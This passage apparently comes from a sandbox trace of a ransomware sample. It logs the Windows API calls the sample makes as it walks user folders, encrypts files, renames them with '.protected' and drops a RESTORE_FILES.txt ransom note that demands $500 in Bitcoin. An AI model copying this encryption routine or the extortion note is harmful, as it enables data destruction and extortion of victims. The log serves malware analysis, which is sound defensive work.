(lpString1=".", lpString2="System Volume Information") returned -1 [0084.585] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\.") returned 105 [0084.585] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.585] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.585] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.585] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.585] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.585] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.585] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.585] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.585] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.585] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.585] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.585] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\..") returned 106 [0084.585] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.585] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.585] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.585] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.585] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.586] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.586] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.586] lstrcmpiW (lpString1="WebSlices~", lpString2="Windows") returned -1 [0084.586] lstrcmpiW (lpString1="WebSlices~", lpString2="Program Files") returned 1 [0084.586] lstrcmpiW (lpString1="WebSlices~", lpString2="Program Files (x86)") returned 1 [0084.586] lstrcmpiW (lpString1="WebSlices~", lpString2="$Recycle.bin") returned 1 [0084.586] lstrcmpiW (lpString1="WebSlices~", lpString2="System Volume Information") returned 1 [0084.586] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 114 [0084.586] lstrcmpW (lpString1="WebSlices~", lpString2=".") returned 1 [0084.586] lstrcmpW (lpString1="WebSlices~", lpString2="..") returned 1 [0084.586] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*") returned 116 [0084.586] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.586] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.586] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.586] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.586] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.586] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.587] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\.") returned 116 [0084.587] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.587] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.587] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.587] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.587] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.587] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.587] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.587] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.587] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.587] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.587] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.587] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\..") returned 117 [0084.587] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.587] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.587] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.587] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.587] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.587] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.587] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.587] lstrcmpiW (lpString1="Suggested Sites~.feed-ms", lpString2="Windows") returned -1 [0084.587] lstrcmpiW (lpString1="Suggested Sites~.feed-ms", lpString2="Program Files") returned 1 [0084.587] lstrcmpiW (lpString1="Suggested Sites~.feed-ms", lpString2="Program Files (x86)") returned 1 [0084.587] lstrcmpiW (lpString1="Suggested Sites~.feed-ms", lpString2="$Recycle.bin") returned 1 [0084.587] lstrcmpiW (lpString1="Suggested Sites~.feed-ms", lpString2="System Volume Information") returned -1 [0084.587] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms") returned 139 [0084.587] StrStrIW (lpFirst="Suggested Sites~.feed-ms", lpSrch=".protected") returned 0x0 [0084.587] lstrcmpW (lpString1="Suggested Sites~.feed-ms", lpString2="RESTORE_FILES.txt") returned 1 [0084.587] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.587] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.588] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms") returned 139 [0084.588] StrStrW (lpFirst="Suggested Sites~.feed-ms", lpSrch=".txt") returned 0x0 [0084.588] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms") returned 139 [0084.588] StrStrW (lpFirst="Suggested Sites~.feed-ms", lpSrch=".rar") returned 0x0 [0084.588] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms") returned 139 [0084.588] StrStrW (lpFirst="Suggested Sites~.feed-ms", lpSrch=".zip") returned 0x0 [0084.588] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.597] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.597] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.597] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.598] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.598] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.598] CloseHandle (hObject=0x154) returned 1 [0084.598] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms.protected") returned 149 [0084.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms.protected")) returned 1 [0084.599] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.599] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Windows") returned -1 [0084.599] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Program Files") returned 1 [0084.599] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Program Files (x86)") returned 1 [0084.599] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="$Recycle.bin") returned 1 [0084.599] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="System Volume Information") returned 1 [0084.599] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 141 [0084.599] StrStrIW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".protected") returned 0x0 [0084.599] lstrcmpW (lpString1="Web Slice Gallery~.feed-ms", lpString2="RESTORE_FILES.txt") returned 1 [0084.599] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.599] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.600] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 141 [0084.600] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".txt") returned 0x0 [0084.600] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 141 [0084.600] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".rar") returned 0x0 [0084.600] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 141 [0084.600] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".zip") returned 0x0 [0084.600] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.606] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.606] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.607] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.607] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.607] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.607] CloseHandle (hObject=0x154) returned 1 [0084.608] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.protected") returned 151 [0084.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.protected")) returned 1 [0084.608] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.608] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.608] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\RESTORE_FILES.txt") returned 132 [0084.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.625] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.626] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.626] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.626] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.626] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.626] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.627] CloseHandle (hObject=0x150) returned 1 [0084.627] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.627] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.627] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RESTORE_FILES.txt") returned 121 [0084.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.633] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.634] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.634] lstrlenA 